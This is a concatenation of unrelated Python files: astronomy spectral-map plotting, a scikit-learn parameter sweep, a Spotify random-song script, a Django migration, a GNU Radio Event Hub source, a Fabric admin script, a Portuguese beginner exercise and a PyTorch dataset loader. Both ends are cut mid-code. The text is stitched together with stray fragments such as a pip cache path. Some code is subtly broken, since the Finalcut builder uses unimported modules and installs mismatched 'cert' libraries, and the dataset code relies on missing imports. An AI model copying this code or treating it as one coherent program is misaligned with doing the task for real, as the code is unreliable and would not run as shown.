np.append(vlsr,vmin) for cut in cuts: vval = np.interp(lon,cut[0],cut[1]) vlsr = np.append(vlsr,vval) vlsr = np.append(vlsr, vmax) # retrieve data, and, in case fit vel, Tb = self.getLineData(lon, lat, vmin, vmax) if useFit: good_fit = False velf, vfit, PV, Tfit, aic = self.getFitResults(lon, lat, vmin, vmax) dev = np.sum(np.abs(Tb - Tfit)) / np.sum(Tb) if np.sum(np.abs(Tb)) == 0.: msg = 'lon {} lat {} NODATA'.format(lon, lat) history.append(msg) elif len(vfit) == 0: msg = 'lon {} lat {} fit FAILED'.format(lon, lat) history.append(msg) elif np.abs(dev) > dev_thresh: msg = 'lon {} lat {} fit BAD, integrated fractional model deviation {}'.format( lon, lat, dev) history.append(msg) else: good_fit = True msg = 'lon {} lat {} integrated fractional model deviation {}'.format( lon, lat, dev) history.append(msg) for s in range(nn): if vcuts: vrange = vcuts[s] vlow = eval(vrange[0]) vup = eval(vrange[1]) elif dcuts or cutfile: vlow = vlsr[s] vup = vlsr[s + 1] if useFit and good_fit: # add integral of all lines that have a peak in the velo range for klin, vlin in enumerate(vfit): if vlin >= vlow and vlin < vup: vmaps[s, bb, ll] += self.column(velf, PV[:, klin]) else: pass # correct for the residual colmn density correction = self.column(vel[(vel >= vlow) & (vel < vup)], Tb[(vel >= vlow) & (vel < vup)]) correction -= self.column(velf[(velf >= vlow) & (velf < vup)], Tfit[(velf >= vlow) & (velf < vup)]) vmaps[s, bb, ll] += correction else: vmaps[s, bb, ll] = self.column(vel[(vel >= vlow) & (vel < vup)], Tb[(vel >= vlow) & (vel < vup)]) # display and in case save maps if saveMaps: # history # takes a while to write in fits, dump separately histfile = gzip.open(outdir + 'lbmap_' + name_tag + 'history.txt.gz', 'wb') for k, line in enumerate(history): if not k == (len(history) - 1): histfile.write((line + '\n').encode()) histfile.close() for s in range(nn): im = grid[s].imshow(vmaps[s], extent=extent, interpolation='none', origin='lower', vmin=-5., cmap='Spectral_r') grid.cbar_axes[s].colorbar(im) t = add_inner_title(grid[s], names[s], loc=2) t.patch.set_ec("none") t.patch.set_alpha(0.5) if saveMaps: try: maphdu = fits.PrimaryHDU(vmaps[s]) lmax_out = self.pix2coord(self.coord2pix(lmax, 'longitude'), 'longitude') bmin_out = self.pix2coord(self.coord2pix(bmin, 'latitude'), 'latitude') bunit = {} if self.int2col == 1: bunit['unit'] = 'K km s-1' bunit['quantity'] = 'v-integrated Tb' else: bunit['unit'] = 'cm-2' bunit['quantity'] = 'N(H)' self.mapheader(maphdu, lmax_out, bmin_out, bunit) # comments if self.int2col != 1.: msg = 'Integral to column: {} cm-2 (K km s-1)-1'.format(self.int2col) self.commheader(maphdu, msg) if self.Ts != -10: self.commheader(maphdu, 'Spin temperature: {} K'.format(self.Ts)) if vcuts: self.commheader(maphdu, 'velocity cuts: ' + str(dcuts)) elif dcuts: self.commheader(maphdu, 'heliocentric distance cuts: ' + str(dcuts)) elif cutfile: self.commheader(maphdu, 'velocity cuts from file: ' + str(cutfile)) if useFit: self.commheader(maphdu, 'correction based on line profile fitting') self.commheader(maphdu, 'Map: n. {}, {}'.format(s, names[s])) self.history(maphdu, authname, authemail) maphdu.writeto(outdir + 'lbmap_' + name_tag + names[s] + '.fits') except: print("Saving map {} failed".format(s)) grid.axes_llc.set_xlabel('$l$ (deg)') grid.axes_llc.set_ylabel('$b$ (deg)') grid.axes_llc.set_xlim(lmax, lmin) grid.axes_llc.set_ylim(bmin, bmax) if display: plt.show() else: pass def vdiagram(self, lmin, lmax, bmin, bmax, vmin, vmax, integrate='latitude'): # convert boundaries into pixels imin = self.coord2pix(lmin, 'longitude') imax = self.coord2pix(lmax, 'longitude') jmin = self.coord2pix(bmin, 'latitude') jmax = self.coord2pix(bmax, 'latitude') kmin = self.coord2pix(vmin * self.vscale, 'velocity') kmax = self.coord2pix(vmax * self.vscale, 'velocity') # establish sense of increasing longitude and velocity ldir = self.delta['longitude'] / abs(self.delta['longitude']) vdir = self.delta['velocity'] / abs(self.delta['velocity']) # set boundaries according to axes order and orientation pixmin = [0, 0, 0] pixmax = [0, 0, 0] if ldir > 0: pixmin[self.atlas['longitude'] - 1] = imin pixmax[self.atlas['longitude'] - 1] = imax else: pixmin[self.atlas['longitude'] - 1] = imax pixmax[self.atlas['longitude'] - 1] = imin pixmin[self.atlas['latitude'] - 1] = jmin pixmax[self.atlas['latitude'] - 1] = jmax if vdir > 0: pixmin[self.atlas['velocity'] - 1] = kmin pixmax[self.atlas['velocity'] - 1] = kmax else: pixmin[self.atlas['velocity'] - 1] = kmax pixmax[self.atlas['velocity'] - 1] = kmin im = self.data[pixmin[2]:pixmax[2], pixmin[1]:pixmax[1], pixmin[0]:pixmax[0]] # if we integrate over latitude make sure longitude increases right to left if integrate == 'latitude' and ldir > 0: im = np.flip(im, axis=(3 - self.atlas['longitude'])) if vdir < 0: im = np.flip(im, axis=(3 - self.atlas['velocity'])) # always make sure velocity increases bottom to top # integrate over appropriate axis im = np.sum(im, axis=(3 - self.atlas[integrate])) # multiply by Delta to obtain K deg if integrate == 'latitude': im *= np.abs(self.delta['latitude']) elif integrate == 'longitude': im *= np.abs(self.delta['longitude']) # create the figure ax = plt.subplot(111) # reorder so that axes appear in the "right" place # and set figure extent and axis labels if integrate == 'latitude': if self.atlas['velocity'] < self.atlas['longitude']: im = im.transpose() extent = (lmax, lmin, vmin, vmax) ax.set_xlabel('$l$ (deg)') ax.set_ylabel('V (km s$^{-1}$)') elif integrate == 'longitude': if self.atlas['velocity'] > self.atlas['latitude']: im = im.transpose() extent = (vmin, vmax, bmin, bmax) ax.set_xlabel('V (km s$^{-1}$)') ax.set_ylabel('$b$ (deg)') # display the map plt.imshow(im, interpolation='none', origin='lower', extent=extent, aspect='auto', norm=LogNorm(vmin=2*np.abs(self.delta['latitude'])), cmap='jet') cbar = plt.colorbar(label="K deg") plt.show() def vdiagram_fit(self, lmin, lmax, bmin, bmax, vmin, vmax, integrate='latitude'): # check if required region is covered by input file, otherwise modify boundaries l1 = self.pix2coord(0, 'longitude') l2 = self.pix2coord(self.naxis['longitude'] - 1, 'longitude') ll = np.minimum(l1, l2) lu = np.maximum(l1, l2) lmin = np.maximum(lmin, ll) lmax = np.minimum(lmax, lu) b1 = self.pix2coord(0, 'latitude') b2 = self.pix2coord(self.naxis['latitude'] - 1, 'latitude') bl = np.minimum(b1, b2) bu = np.maximum(b1, b2) bmin = np.maximum(bmin, bl) bmax = np.minimum(bmax, bu) v1 = self.pix2coord(0, 'velocity')/self.vscale v2 = self.pix2coord(self.naxis['velocity'] - 1, 'velocity')/self.vscale vl = np.minimum(v1, v2) vu = np.maximum(v1, v2) vmin = np.maximum(vmin, vl) vmax = np.minimum(vmax, vu) # binning parameters lbins = int((lmax - lmin) / abs(self.delta['longitude'])) + 1 bbins = int((bmax - bmin) / abs(self.delta['latitude'])) + 1 vbins = int((vmax - vmin) / abs(self.delta['velocity']/self.vscale)) + 1 ldir = self.delta['longitude'] / abs(self.delta['longitude']) bdir = self.delta['latitude'] / abs(self.delta['latitude']) vdir = self.delta['velocity'] / abs(self.delta['velocity']) # create output array if integrate == 'latitude': im = np.zeros([vbins,lbins]) elif integrate == 'longitude': im = np.zeros([bbins, vbins]) for ll in range(lbins): print(ll,'of',lbins) for bb in range(bbins): lpix = self.coord2pix(lmax, 'longitude') - ll * ldir bpix = self.coord2pix(bmin, 'latitude') + bb * bdir lon = self.pix2coord(lpix, 'longitude') lat = self.pix2coord(bpix, 'latitude') velf, vfit, PV, Tfit, aic = self.getFitResults(lon, lat, vmin, vmax) for vv in range(vbins): vpix = self.coord2pix(self.vscale * vmin, 'velocity') + vv * vdir vel = self.pix2coord(vpix, 'velocity')/self.vscale for klin, vlin in enumerate(vfit): # check if line velocity falls within bin and that there is valid a fitted profile if np.abs(vlin - vel) <= np.abs(self.delta['velocity']/self.vscale) / 2 and \ klin < len(PV[0,:]): if integrate == 'latitude': im[vv,ll] += self.column(velf, PV[:, klin]) elif integrate == 'longitude': im[bb,vv] += self.column(velf, PV[:, klin]) else: pass print('done') # create the figure ax = plt.subplot(111) # and set figure extent and axis labels if integrate == 'latitude': extent = (lmax, lmin, vmin, vmax) ax.set_xlabel('$l$ (deg)') ax.set_ylabel('V (km s$^{-1}$)') if integrate == 'longitude': extent = (vmin, vmax, bmin, bmax) ax.set_xlabel('V (km s$^{-1}$)') ax.set_ylabel('$b$ (deg)') # display the map plt.imshow(im, interpolation='none', origin='lower', extent=extent, aspect='auto', norm=LogNorm(vmin=1), cmap='jet') cbar = plt.colorbar(label="N(H) 10^20 cm^-2") plt.show()import unittest # Wait until refactor here # from conduit.utils.datajoint_hook import * class TestDatajointHook(unittest.TestCase): def setUp(self): pass src/models/grid_sweep.py from itertools import product import numpy as np import pandas as pd from joblib import Parallel, delayed from sklearn.base import BaseEstimator from sklearn.model_selection import ParameterGrid class GridSweep(BaseEstimator): """Provides functionality for sweeping over parameters using sklearn-like estimators Parameters ---------- estimator : estimator object. This is assumed to implement the scikit-learn estimator interface. Either estimator needs to provide a ``score`` function, or ``scoring`` must be passed. param_grid : dict or list of dictionaries Dictionary with parameters names (string) as keys and lists of parameter settings to try as values, or a list of such dictionaries, in which case the grids spanned by each dictionary in the list are explored. This enables searching over any sequence of parameter settings. scoring : dict or None, default: None A dict with names as keys and callables as values. The callables should have the signature (``estimator``, ``X``, ``y``) and return a scalar value. If ``None``, the model's ``score`` method is called n_jobs : int or None, optional (default=None) Number of jobs to run in parallel. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary ` for more details. pre_dispatch : int, or string, optional Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A string, giving an expression as a function of n_jobs, as in '2*n_jobs' refit : boolean, string, or callable, default=True Refit an estimator using the best found parameters on the whole dataset. For multiple metric evaluation, this needs to be a string denoting the scorer that would be used to find the best parameters for refitting the estimator at the end. Where there are considerations other than maximum score in choosing a best estimator, ``refit`` can be set to a function which returns the selected ``best_index_`` given ``cv_results_``. The refitted estimator is made available at the ``best_estimator_`` attribute and permits using ``predict`` directly on this ``GridSearchCV`` instance. Also for multiple metric evaluation, the attributes ``best_index_``, ``best_score_`` and ``best_params_`` will only be available if ``refit`` is set and all of them will be determined w.r.t this specific scorer. ``best_score_`` is not returned if refit is callable. See ``scoring`` parameter to know more about multiple metric evaluation. verbose : integer Controls the verbosity: the higher, the more messages. n_init : int, optional (default=1) number of random initializations to try for each parameter set seed : int or RandomState random seed to use small_better : bool, optional, (default=True) whether small values of ``scoring`` functions are better than large values. Only matters when using ``refit`` Returns ------- [type] [description] """ def __init__( self, estimator, param_grid, scoring=None, n_jobs=1, refit=False, verbose=0, pre_dispatch="2*n_jobs", n_init=1, seed=None, small_better=True, ): # TODO input validation self.estimator = estimator self.param_grid = param_grid self.scoring = scoring self.n_jobs = n_jobs self.refit = refit self.verbose = verbose self.pre_dispatch = pre_dispatch self.n_init = n_init self.seed = seed self.small_better = small_better def fit(self, X, y=None): np.random.seed(self.seed) if not isinstance(self.param_grid, list): param_grid = list(ParameterGrid(self.param_grid)) estimator = self.estimator seeds = np.random.randint(1e8, size=self.n_init) def estimator_fit(params, seed): np.random.seed(seed) model = estimator(**params) model.fit(X, y=y) return model parallel = Parallel( n_jobs=self.n_jobs, verbose=self.verbose, pre_dispatch=self.pre_dispatch ) if self.verbose > 0: print("Fitting models...") models = parallel( delayed(estimator_fit)(p, s) for p, s in product(param_grid, seeds) ) scorers = self.scoring def estimator_score(model): scores = {} if scorers is not None: for name, scorer in scorers.items(): scores[name] = scorer(model, X, y=y) else: scores = {"score": model.score(X, y=y)} return scores if self.verbose > 0: print("Scoring models...") model_scores = parallel(delayed(estimator_score)(m) for m in models) result_df = pd.DataFrame(model_scores) self.result_df_ = result_df if self.refit is not False: if self.small_better: best_ind = result_df[self.refit].idxmin() else: best_ind = result_df[self.refit].idxmax() self.model_ = models[best_ind] return self import os import spotipy import sys import math import random import requests import json import base64 from datetime import datetime from spotipy.oauth2 import SpotifyClientCredentials class RandomSongGenerator: # Spotify API credentials CLIENT_ID = "8b9f85860db442c596871ea138aa4d60" CLIENT_SECRET = "" SPOTIFY_TOKEN_URL = "https://accounts.spotify.com/api/token" SPOTIFY_API_BASE_URL = "https://api.spotify.com" API_VERSION = "v1" SPOTIFY_API_URL = "{}/{}".format(SPOTIFY_API_BASE_URL, API_VERSION) def get_token(self): # Converts spotify api information into token client_token = base64.b64encode( "{}:{}".format(self.CLIENT_ID, self.CLIENT_SECRET).encode("UTF-8") ).decode("ascii") headers = {"Authorization": "Basic {}".format(client_token)} payload = {"grant_type": "client_credentials"} token_request = requests.post( self.SPOTIFY_TOKEN_URL, data=payload, headers=headers ) access_token = json.loads(token_request.text)["access_token"] return access_token def getRandomSong(self, access_token, genre=None): # Creates a random Spotify API hash random_wildcards = [ "%25a%25", "a%25", "%25a", "%25e%25", "e%25", "%25e", "%25i%25", "i%25", "%25i", "%25o%25", "o%25", "%25o", "%25u%25", "u%25", "%25u", ] wildcard = random.choice(random_wildcards) # Picks a random spotify song based on genre and hash authorization_header = {"Authorization": "Bearer {}".format(access_token)} song_request = requests.get( "{}/search?q={}{}&type=track&offset={}".format( self.SPOTIFY_API_URL, wildcard, "%20genre:%22{}%22".format(genre.replace(" ", "%20")), random.randint(0, 200), ), headers=authorization_header, ) song_info = random.choice(json.loads(song_request.text)["tracks"]["items"]) artist = song_info["artists"][0]["name"] song = song_info["name"] return "{} - {}".format(artist, song) test = RandomSongGenerator() token = test.get_token() for i in range(15): print(test.getRandomSong(token, "pop")) # Generated by Django 3.1.4 on 2021-03-06 18:07 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('Main', '0034_auto_20210306_2058'), ] operations = [ migrations.RemoveField( model_name='product', name='a', ), migrations.AddField( model_name='productattribute', name='heart', field=models.ManyToManyField(blank=True, null=True, to=settings.AUTH_USER_MODEL), ), ] #!/usr/bin/env python # -*- coding: utf-8 -*- from gnuradio import gr from azure.eventhub import EventHubConsumerClient from azure.schemaregistry import SchemaRegistryClient from azure.schemaregistry.serializer.avroserializer import SchemaRegistryAvroSerializer from azure.identity import DefaultAzureCredential from eventhubs import models import threading import pmt schema_content = models.EventHubDataFrame.avro_schema() class eventhub_detect_source(gr.sync_block): def __init__(self,connection_str: str = None, endpoint: str = None, schema_group: str = None, eventhub_name: str = None, consumer_group: str = None, starting_position = None): gr.sync_block.__init__(self, name="eventhub_detect_source", in_sig=[], out_sig=[]) self.token_credential = DefaultAzureCredential() self.endpoint = endpoint self.schema_group = schema_group self.eventhub_connection_str = connection_str self.eventhub_name = eventhub_name self.consumer_group = consumer_group self.starting_position = starting_position self.schema_registry_client = SchemaRegistryClient(self.endpoint, self.token_credential) self.avro_serializer = SchemaRegistryAvroSerializer(self.schema_registry_client, self.schema_group) self.eventhub_consumer = EventHubConsumerClient.from_connection_string( conn_str=self.eventhub_connection_str, consumer_group=self.consumer_group, eventhub_name=self.eventhub_name) self.message_port_register_out(pmt.intern('out')) self.rxthread = threading.Thread(target=self.receive) self.rxthread.start() def receive(self): self.eventhub_consumer.receive(on_event=self.on_event, starting_position=self.starting_position) def on_event(self, partition_context, event): bytes_payload = b"".join(b for b in event.body) deserialized_data = self.avro_serializer.deserialize(bytes_payload) #print("packet n is %s" % deserialized_data['pkt_num']) if deserialized_data['zc_root'] != None and deserialized_data['channel_idx'] != None: a = pmt.make_dict() a = pmt.dict_add(a, pmt.string_to_symbol("zc_root"), pmt.from_long(deserialized_data['zc_root'])) a = pmt.dict_add(a, pmt.string_to_symbol("chan_idx"), pmt.from_long(deserialized_data['channel_idx'])) self.message_port_pub(pmt.intern("out"), a) def work(self, input_items, output_items): return 0 def stop(self): self.eventhub_consumer.close() self.rxthread.join() 1-10 from .core import types import random nQuiz = 1000 data = [] f = open(file="out.txt", mode='w') for i in range(nQuiz): # make quiz first = random.choice(range(1, 100000)) second = random.choice(range(1, 100000)) operator = random.choice(["+", "-", "*", "/", "%"]) # please flush property true print(first, operator, second, sep=" ", flush=True) # get python's answer pyAns = 0 if operator == "+": pyAns = first + second if operator == "-": pyAns = first - second if operator == "*": pyAns = first * second if operator == "/": pyAns = first / second if operator == "%": pyAns = first % second # get c++'s answer cppAns = input() # compare with table data.append([first, operator, second, pyAns, cppAns]) for i in range(nQuiz): first, operator, second, pyAns, cppAns = data[i][0], data[i][1], data[i][2], data[i][3], data[i][4] # please flush property true print(str(first)+" "+operator+" "+str(second)+" = (python: "+str(pyAns)+", cpp: "+cppAns+")", flush=True) print(str(first)+" "+operator+" "+str(second)+" = (python: "+str(pyAns)+", cpp: "+cppAns+")", file=f)0 import os import smpl.util as util import smpl.exec as exec import smpl.log_module as logger from smpl.package import LibraryPackage from smpl.config_file import ConfigObject, PackageParms class Finalcut(LibraryPackage): def __init__(self, name, parms: PackageParms, cfg_obj: ConfigObject): super().__init__(name, cfg_obj) self.name = name self.parms = parms self.release = "v0.6.0" self.git_url = "https://github.com/gansm/finalcut.git" self.package_clone_dir_path = os.path.join(self.cfg_obj.clone_dir, "finalcut") self.git_branch_arg = "stable" self.package_stage_include_dir_path = os.path.join(self.cfg_obj.stage_dir, "include", "final") self.package_vendor_include_dir_path = os.path.join(self.cfg_obj.vendor_dir, "include", "final") def get_package(self): self.get_git_repo(self.git_url, "finalcut", self.git_branch_arg) def stage_package(self): util.clear_directory(self.package_stage_include_dir_path) util.rm_file("{}/libfinal*".format(self.stage_lib_dir_path)) sys_desc = platform.platform() if re.search('Linux', sys_desc) is not None \ and re.search('x86_64', sys_desc) is not None: arch_arg = "linux-x86_64" elif re.search('Darwin', sys_desc) is not None: arch_arg = "darwin64-x86_64-cc" else: raise RuntimeError("could not determine platform type for finalcut build options - platform is: {}".format(sys_desc)) exec.run(["autoreconf", "--install", "--force"]) exec.run(["./configure", "--prefix={}".format(self.cfg_obj.stage_dir), "--debug" # arch_arg, # "linux-x86_64" # "darwin64-x86_64-cc" ], self.package_clone_dir_versioned_path) exec.run(["make", "all"], self.package_clone_dir_versioned_path) exec.run(["make", "install"], self.package_clone_dir_versioned_path) def install_package(self): self.headers_from_stage_to_vendor("cert", "cert") self.libs_from_stage_to_vendor("libcert.*") # Aula 18 - 03-12-2019 # interação de lista com o for # Usando o comando for vamos fazer uma interação de varialvel tipo coleção. A interação é (simplificadamente) # percorer toda a variavel e isolar seu valores. # 1.1 Com a seguinte lista, use o for para interar esta tupla e apresentar (usando o f-string) # O nome da cerveja, # tipo da cerveja, o IBU da cerveja e o preço dela. cerveja = (('marca', 'tipo', 'ibu','preço'), ('Skol','IPA','ultra-leve',3.50), ('Brahma','lager','leve/media',3.45), ('Kaiser','Americam Larger','leve',2.35), ('Sol','larger mão','agua',1.19) ) cabe = cerveja[0] # ('marca', 'tipo', 'ibu','preço') dados = cerveja[1:] # for dados_cerveja in dados: # for i in range (4): # print(f"{cabe[i]} {dados_cerveja[i]}") # 1.2 Crie uma função que receba esta tupla e devolva uma lista com # um dicionários # referenciando cada uma destas cervejas. def recebe(cerveja): cabe = cerveja[0] # Separar o cabeçalho da tuplua dados = cerveja[1:] # Separar os dados da tupla lista_cerva = [] # Iniciar uma lista para receber os dados for dados_cerveja in dados: # For para quebrar os dados # Gerando o dicionário para armazenar os dados dicionario = {cabe[0]:dados_cerveja[0],cabe[1]:dados_cerveja[1], cabe[2]:dados_cerveja[2],cabe[3]:dados_cerveja[3]} lista_cerva.append(dicionario) # Adicionando o dicionario na lista return lista_cerva #Retornando a lista para o programa. print(recebe(cerveja)) [ {'marca': 'Skol', 'tipo': 'IPA', 'ibu': 'ultra-leve', 'preço': 3.5}, {'marca': 'Brahma', 'tipo': 'lager', 'ibu': 'leve/media', 'preço': 3.45}, {'marca': 'Kaiser', 'tipo': 'Americam Larger', 'ibu': 'leve', 'preço': 2.35}, {'marca': 'Sol', 'tipo': 'larger mão', 'ibu': 'agua', 'preço': 1.19} ]6. Images/Load Digits Dataset from scikit-learn.py1-10 import originpro as op from sklearn.datasets import load_digits digits = load_digits() # load digit images, total 1797 images, each is 8x8 aa = digits.images.astype(dtype='uint8') iw = op.new_image() iw.setup(1, True) # set image window is gray scale, with multiple frames data = aa[0:10,:,:] iw.from_np(data, False) iw.set_int('GrayMax',16) #set to show only 17 colors (0-16) iw.set_int('nav', 3) # Show navigation bar as slider iw.set_str('Palette', 'Fire') zouzias/fabric from fabric.api import * env.hosts = ['host1', 'host2'] env.use_ssh_config = True def host_type(): run('uname -s') def apt_update(): sudo('apt-get update') def apt_upgrade(): sudo('apt-get -qy upgrade') def uptime(): run('uptime') def reboot(): sudo('reboot') # Used for the commandline flags. HEAD_CHOICES = ( 'direct', 'direct_normalize', 'fc1024', 'fc1024_normalize', 'fc1024_spatial_attention', 'fc1024_spatial_attention_softmax', 'fc1024_MBA_5b_addition', 'fc1024_MBA_5b_kl_addition', 'fc1024_MBA_5b_js_addition', 'fc1024_MBA_5b_concat', 'fc1024_MBA_5b_kl_concat', 'fc1024_MBA_5b_js_concat', 'fc1024_fixed_attention', 'fc1024_recurrent_attention', 'fc1024_recurrent_attention_wstop', 'fc1024_inception_spatial_attention', 'fc1024_inception_recurrent_attention', 'fc1024_inception_residual_attention_light', 'fc1024_inception_mixed_attention', 'fc1024_inception_multi-resolution_spatial_attention', 'fc1024_inception_multi-head_attention', 'fc1024_inception_multi-head_residual_attention', 'fc1024_inception_MBA_5b_addition', 'fc1024_inception_MBA_5b_multi_embs', 'fc1024_inception_MBA_5b_addition_linear', 'fc1024_inception_MBA_5b_addition_single_residual', 'fc1024_inception_MBA_5b_addition_joint', 'fc1024_inception_multi-residual-head_attention', 'fc1024_inception_multi-residual-head_attention_kl', 'fc1024_inception_multi-residual-head_attention_5_branch', 'fc1024_inception_multi-residual-head_attention_8_branch', 'fc1024_inception_multi-residual-head_attention_1e-2', 'fc1024_inception_min-max_spatial_attention', 'fc1024_inception_residual_attention_light_tanh', 'fc1024_residual_attention-heavy', 'fc1024_mixed_attention', 'fc1024_multi-resolution_spatial_attention', 'fc1024_multi-head_attention', 'global_pooling_inception_mixed_attention', 'fc1024_vgg_MBA_5b_addition', 'fc1024_vgg_MBA_5b_kl_addition', ) /home/runner/.cache/pip/pool/3f/10/5e/0da870cfd442c4b93168f62f7eb1f09417d637dc6c7f4acefd6341907esmall_scale/datasets.py import csv, torchvision, numpy as np, random, os from PIL import Image import numpy as np import copy from torch.utils.data import Sampler, Dataset, DataLoader, BatchSampler, SequentialSampler, RandomSampler, Subset from torchvision import transforms, datasets from collections import defaultdict class IdentityBatchSampler(Sampler): def __init__(self, dataset, batch_size, num_instances, num_iterations=None): self.dataset = dataset self.batch_size = batch_size self.num_instances = num_instances self.num_iterations = num_iterations def __iter__(self): indices = list(range(len(self.dataset))) random.shuffle(indices) for k in range(len(self)): offset = k*self.batch_size%len(indices) batch_indices = indices[offset:offset+self.batch_size] pair_indices = [] for idx in batch_indices: y = self.dataset.get_class(idx) t = copy.deepcopy(self.dataset.classwise_indices[y]) t.pop(t.index(idx)) if len(t)>=(self.num_instances-1): class_indices = np.random.choice(t, size=self.num_instances-1, replace=False) else: class_indices = np.random.choice(t, size=self.num_instances-1, replace=True) pair_indices.extend(class_indices) yield batch_indices+pair_indices def __len__(self): if self.num_iterations is None: return (len(self.dataset)+self.batch_size-1) // (self.batch_size) else: return self.num_iterations class PairBatchSampler(Sampler): def __init__(self, dataset, batch_size, num_iterations=None): self.dataset = dataset self.batch_size = batch_size self.num_iterations = num_iterations def __iter__(self): indices = list(range(len(self.dataset))) random.shuffle(indices) for k in range(len(self)): if self.num_iterations is None: offset = k*self.batch_size batch_indices = indices[offset:offset+self.batch_size] else: batch_indices = random.sample(range(len(self.dataset)), self.batch_size) pair_indices = [] for idx in batch_indices: y = self.dataset.get_class(idx) pair_indices.append(random.choice(self.dataset.classwise_indices[y])) yield batch_indices + pair_indices def __len__(self): if self.num_iterations is None: return (len(self.dataset)+self.batch_size-1) // self.batch_size else: return self.num_iterations class DatasetWrapper(Dataset): # Additinoal attributes # - indices # - classwise_indices # - num_classes # - get_class def __init__(self, dataset, indices=None): self.base_dataset = dataset if indices is None: self.indices = list(range(len(dataset))) else: self.indices = indices # torchvision 0.2.0 compatibility if torchvision.__version__.startswith('0.2'): if isinstance(self.base_dataset, datasets.ImageFolder): self.base_dataset.targets = [s[1] for s in self.base_dataset.imgs] else: if self.base_dataset.train: self.base_dataset.targets = self.base_dataset.train_labels else: self.base_dataset.targets = self.base_dataset.test_labels self.classwise_indices = defaultdict(list) for i in range(len(self)): y = self.base_dataset.targets[self.indices[i]] self.classwise_indices[y].append(i) self.num_classes = max(self.classwise_indices.keys())+1 def __getitem__(self, i): return self.base_dataset[self.indices[i]] def __len__(self): return len(self.indices) def get_class(self, i): return self.base_dataset.targets[self.indices[i]] class ConcatWrapper(Dataset): # TODO: Naming @staticmethod def cumsum(sequence): r, s = [], 0 for e in sequence: l = len(e) r.append(l + s) s += l return r @staticmethod def numcls(sequence): s = 0 for e in sequence: l = e.num_classes s += l return s @staticmethod def clsidx(sequence): r, s, n = defaultdict(list), 0, 0 for e in sequence: l = e.classwise_indices for c in range(s, s + e.num_classes): t = np.asarray(l[c-s]) + n r[c] = t.tolist() s += e.num_classes n += len(e) return r def __init__(self, datasets): super(ConcatWrapper, self).__init__() assert len(datasets) > 0, 'datasets should not be an empty iterable' self.datasets = list(datasets) # for d in self.datasets: # assert not isinstance(d, IterableDataset), "ConcatDataset does not support IterableDataset" self.cumulative_sizes = self.cumsum(self.datasets) self.num_classes = self.numcls(self.datasets) self.classwise_indices = self.clsidx(self.datasets) def __len__(self): return self.cumulative_sizes[-1] def __getitem__(self, idx): if idx < 0: if -idx > len(self): raise ValueError("absolute value of index should not exceed dataset length") idx = len(self) + idx dataset_idx = bisect.bisect_right(self.cumulative_sizes, idx) if dataset_idx == 0: sample_idx = idx else: sample_idx = idx - self.cumulative_sizes[dataset_idx - 1] return self.datasets[dataset_idx][sample_idx] def get_class(self, idx): if idx < 0: if -idx > len(self): raise ValueError("absolute value of index should not exceed dataset length") idx = len(self) + idx dataset_idx = bisect.bisect_right(self.cumulative_sizes, idx) if dataset_idx == 0: sample_idx = idx else: sample_idx = idx - self.cumulative_sizes[dataset_idx - 1] true_class = self.datasets[dataset_idx].base_dataset.targets[self.datasets[dataset_idx].indices[sample_idx]] return self.datasets[dataset_idx].base_dataset.target_transform(true_class) @property def cummulative_sizes(self): warnings.warn("cummulative_sizes attribute is renamed to " "cumulative_sizes", DeprecationWarning, stacklevel=2) return self.cumulative_sizes def load_dataset(name, root, sample='default', **kwargs): # Dataset if name in ['imagenet','tinyimagenet', 'CUB200', 'STANFORD120', 'MIT67']: # TODO if name == 'tinyimagenet': transform_train = transforms.Compose([ transforms.RandomResizedCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) transform_test = transforms.Compose([ transforms.Resize(32), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) train_val_dataset_dir = os.path.join(root, "tinyimagenet/train") test_dataset_dir = os.path.join(root, "tinyimagenet/val") trainset = DatasetWrapper(datasets.ImageFolder(root=train_val_dataset_dir, transform=transform_train)) valset = DatasetWrapper(datasets.ImageFolder(root=test_dataset_dir, transform=transform_test)) elif name == 'imagenet': transform_train = transforms.Compose([ transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) transform_test = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) train_val_dataset_dir = os.path.join(root, "train") test_dataset_dir = os.path.join(root, "val") trainset = DatasetWrapper(datasets.ImageFolder(root=train_val_dataset_dir, transform=transform_train)) valset = DatasetWrapper(datasets.ImageFolder(root=test_dataset_dir, transform=transform_test)) else: transform_train = transforms.Compose([ transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) transform_test = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) train_val_dataset_dir = os.path.join(root, name, "train") test_dataset_dir = os.path.join(root, name, "test") trainset = DatasetWrapper(datasets.ImageFolder(root=train_val_dataset_dir, transform=transform_train)) valset = DatasetWrapper(datasets.ImageFolder(root=test_dataset_dir, transform=transform_test)) elif name.startswith('cifar'): transform_train = transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) if name == 'cifar10': CIFAR = datasets.CIFAR10 else: CIFAR = datasets.CIFAR100 trainset = DatasetWrapper(CIFAR(root, train=True, download=True, transform=transform_train)) valset = DatasetWrapper(CIFAR(root, train=False, download=True, transform=transform_test)) else: raise Exception('Unknown dataset: {}'.format(name)) # Sampler if sample == 'default': 